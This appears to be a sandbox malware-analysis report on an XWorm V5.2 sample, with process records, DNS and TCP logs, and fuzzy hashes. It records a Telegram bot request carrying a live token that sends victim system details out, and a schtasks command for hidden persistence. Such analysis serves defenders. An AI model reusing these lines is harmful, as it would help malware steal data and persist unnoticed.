                                                                                                                                                                                                        Feb 7, 2024 03:23:26.908165932 CET4976522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.098839998 CET2210049765167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.099091053 CET4976522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.123548031 CET2210049765167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:27.314250946 CET2210049765167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:31.948301077 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.153444052 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.153553963 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.165406942 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.358711004 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.358825922 CET4976622100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.370217085 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:32.563851118 CET2210049766167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.246032953 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.450133085 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.450325966 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.461704016 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.654465914 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.654654026 CET4976722100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.665570021 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:37.858510971 CET2210049767167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.558099031 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.764597893 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.764844894 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.776726961 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.971240044 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.971329927 CET4976822100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:42.982429028 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:43.177328110 CET2210049768167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:47.806905031 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.010510921 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.010750055 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.026173115 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.214940071 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.215051889 CET4976922100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.229533911 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:48.418348074 CET2210049769167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.061991930 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.273466110 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.273571014 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.285332918 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.484829903 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.484915018 CET4977022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.496141911 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:53.696448088 CET2210049770167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.432141066 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.642183065 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.642415047 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.683295012 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.852344990 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.852588892 CET4977122100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:23:58.893049955 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:23:59.062669992 CET2210049771167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.020785093 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.238436937 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.238604069 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.256424904 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.455579042 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.455733061 CET4977222100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.473047972 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:04.672543049 CET2210049772167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.294312000 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.499277115 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.499413013 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.519639015 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.704211950 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.704340935 CET4977322100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.724591970 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:09.908778906 CET2210049773167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.715858936 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.933320999 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.933521986 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:14.956003904 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.150609016 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.150784969 CET4977422100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.173229933 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:15.369344950 CET2210049774167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.151688099 CET4977522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.367284060 CET2210049775167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:24:20.367484093 CET4977522100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.048465967 CET4979022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.061172962 CET4979022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.258522987 CET2210049790167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.258616924 CET4979022100192.168.2.6167.71.56.116
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.270622969 CET2210049790167.71.56.116192.168.2.6
                                                                                                                                                                                                        Feb 7, 2024 03:25:01.468153954 CET2210049790167.71.56.116192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 7, 2024 03:21:56.824778080 CET | 53882 | 53 | 192.168.2.6 | 1.1.1.1
Feb 7, 2024 03:21:56.943655968 CET | 53 | 53882 | 1.1.1.1 | 192.168.2.6
Feb 7, 2024 03:21:58.217967987 CET | 56374 | 53 | 192.168.2.6 | 1.1.1.1
Feb 7, 2024 03:21:58.437144041 CET | 53 | 56374 | 1.1.1.1 | 192.168.2.6
Feb 7, 2024 03:22:59.236150980 CET | 50213 | 53 | 192.168.2.6 | 1.1.1.1
Feb 7, 2024 03:22:59.395288944 CET | 53 | 50213 | 1.1.1.1 | 192.168.2.6
Feb 7, 2024 03:24:03.839309931 CET | 56729 | 53 | 192.168.2.6 | 1.1.1.1
Feb 7, 2024 03:24:04.019679070 CET | 53 | 56729 | 1.1.1.1 | 192.168.2.6
Feb 7, 2024 03:25:11.037131071 CET | 54546 | 53 | 192.168.2.6 | 1.1.1.1
Feb 7, 2024 03:25:11.469223976 CET | 53 | 54546 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 7, 2024 03:21:56.824778080 CET | 192.168.2.6 | 1.1.1.1 | 0x1298 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:21:58.217967987 CET | 192.168.2.6 | 1.1.1.1 | 0xb98e | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:22:59.236150980 CET | 192.168.2.6 | 1.1.1.1 | 0xbc44 | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:24:03.839309931 CET | 192.168.2.6 | 1.1.1.1 | 0xda06 | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:25:11.037131071 CET | 192.168.2.6 | 1.1.1.1 | 0xbcb6 | Standard query (0) | trusting-smoke-90361.pktriot.net | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 7, 2024 03:21:56.943655968 CET | 1.1.1.1 | 192.168.2.6 | 0x1298 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:21:58.437144041 CET | 1.1.1.1 | 192.168.2.6 | 0xb98e | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 7, 2024 03:21:58.437144041 CET | 1.1.1.1 | 192.168.2.6 | 0xb98e | No error (0) | eu-central-7075.packetriot.net |  | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:22:59.395288944 CET | 1.1.1.1 | 192.168.2.6 | 0xbc44 | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 7, 2024 03:22:59.395288944 CET | 1.1.1.1 | 192.168.2.6 | 0xbc44 | No error (0) | eu-central-7075.packetriot.net |  | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:24:04.019679070 CET | 1.1.1.1 | 192.168.2.6 | 0xda06 | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 7, 2024 03:24:04.019679070 CET | 1.1.1.1 | 192.168.2.6 | 0xda06 | No error (0) | eu-central-7075.packetriot.net |  | 167.71.56.116 | A (IP address) | IN (0x0001) | false
Feb 7, 2024 03:25:11.469223976 CET | 1.1.1.1 | 192.168.2.6 | 0xbcb6 | No error (0) | trusting-smoke-90361.pktriot.net | eu-central-7075.packetriot.net |  | CNAME (Canonical name) | IN (0x0001) | false
Feb 7, 2024 03:25:11.469223976 CET | 1.1.1.1 | 192.168.2.6 | 0xbcb6 | No error (0) | eu-central-7075.packetriot.net |  | 167.71.56.116 | A (IP address) | IN (0x0001) | false

• api.telegram.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49699 | 149.154.167.220 | 443 | 7096 | C:\Users\user\Desktop\X.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-07 02:21:57 UTC | 451 | OUT | GET /bot6731733957:AAGWQfODbJKr7tNuz5LDiFk41dKVxsOuAEA/sendMessage?chat_id=2031060627&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AE9633C7A2F2B74FB9C2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%208ZZ4CZYT%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-02-07 02:21:58 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 07 Feb 2024 02:21:57 GMT
Content-Type: application/json
Content-Length: 456
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-02-07 02:21:58 UTC | 456 | IN | Data Ascii: {"ok":true,"result":{"message_id":3190,"from":{"id":6731733957,"is_bot":true,"first_name":"i really hate this","username":"ireallyhatethisbot"},"chat":{"id":2031060627,"first_name":"Lukky","username":"Lukky053","type":"private"},"date":1707272517,"text":"



Target ID: 0
Start time: 03:21:50
Start date: 07/02/2024
Path: C:\Users\user\Desktop\X.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\Desktop\X.exe
Imagebase: 0x1f0000
File size: 36'864 bytes
MD5 hash: F57EC853B0F01B0E9954CFBF8FEEB081
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2058996703.00000000001F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
Reputation: low
Has exited: true

Target ID: 2
Start time: 03:21:55
Start date: 07/02/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Svchost" /tr "C:\Users\user\AppData\Local\Temp\Svchost.exe"
Imagebase: 0x7ff68ad30000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 3
Start time: 03:21:55
Start date: 07/02/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 03:21:57
Start date: 07/02/2024
Path: C:\Users\user\AppData\Local\Temp\Svchost.exe
Wow64 process (32bit): false
Commandline: C:\Users\user\AppData\Local\Temp\Svchost.exe
Imagebase: 0x520000
File size: 36'864 bytes
MD5 hash: F57EC853B0F01B0E9954CFBF8FEEB081
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Svchost.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                        • Detection: 82%, ReversingLabs
                                                                                                                                                                                                        • Detection: 79%, Virustotal
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                        Start time:03:22:01
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                        Start time:03:22:07
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Svchost.exe"
                                                                                                                                                                                                        Imagebase:0xf70000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                        Start time:03:22:15
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Svchost.exe"
                                                                                                                                                                                                        Imagebase:0x50000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                        Start time:03:23:00
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x7f0000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                        Start time:03:24:00
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x580000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                        Start time:03:25:00
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\Svchost.exe
                                                                                                                                                                                                        Imagebase:0x600000
                                                                                                                                                                                                        File size:36'864 bytes
                                                                                                                                                                                                        MD5 hash:F57EC853B0F01B0E9954CFBF8FEEB081
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                        Start time:03:25:04
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                        Imagebase:0x7ff7403e0000
                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                        Start time:03:25:04
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -pss -s 460 -p 7096 -ip 7096
                                                                                                                                                                                                        Imagebase:0x7ff6022e0000
                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                        Start time:03:25:04
                                                                                                                                                                                                        Start date:07/02/2024
                                                                                                                                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7096 -s 2972
                                                                                                                                                                                                        Imagebase:0x7ff6022e0000
                                                                                                                                                                                                        File size:570'736 bytes
                                                                                                                                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                        Has exited:true

Target ID:18
Start time:03:25:06
Start date:07/02/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:0x7ff7403e0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

                                                                                                                                                                                                          • Instruction ID: a6f77d4a87cecf5009f440ba4cf9213807e30ad9619d9dc992cfe7b911c2d380
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 491e84ddd21a8dd43592bb48fb133243a94f4f6905b1660ffd3e80944114982c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77712971B0DA4C4FEB95EB6884A96F87BE1EF4A310F4400BAE44DD72D3CD68AC419781
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 942e8d020b5d8bbc32cbbc983ea90701082b7cf19fd1c9047a84731b5fca2d3b
                                                                                                                                                                                                          • Instruction ID: 415b645f862da8a36294a084b8ed5b650ef0ee67a22c07b0686b2dade32d2c62
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 942e8d020b5d8bbc32cbbc983ea90701082b7cf19fd1c9047a84731b5fca2d3b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22B194207289064BF694B7EC98B67BAB2D6EF99301F640579E00DC32E3DD687C41C642
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a583a8885934dacac1633ee618fac77defe41e6649a12f260ce6e7092154330f
                                                                                                                                                                                                          • Instruction ID: bddb1b66a3d858377a1acfbb6f4c0d3b1b1f954fb6dc1e2a72f9bf1e1108d1c4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a583a8885934dacac1633ee618fac77defe41e6649a12f260ce6e7092154330f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17A1A4207289055FEB94B7EC94767BAB2D6EF99700F680279E00DD32D7DD68BC018792
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0bb94ad51c90c9eb42c5969334cc3826cd2ae475bf4fa27f0ab7e79c841e8df4
                                                                                                                                                                                                          • Instruction ID: d7382bf6a7e3d92c35bfd52ea112e390a4662d8b63cac56e57274d433c6c0bbe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bb94ad51c90c9eb42c5969334cc3826cd2ae475bf4fa27f0ab7e79c841e8df4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0B19630608B8D4FEB69DF28D8557E93BE1FF55310F14426AE84DC7292CE78A9458BC2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.4060275653.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffd348b0000_X.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
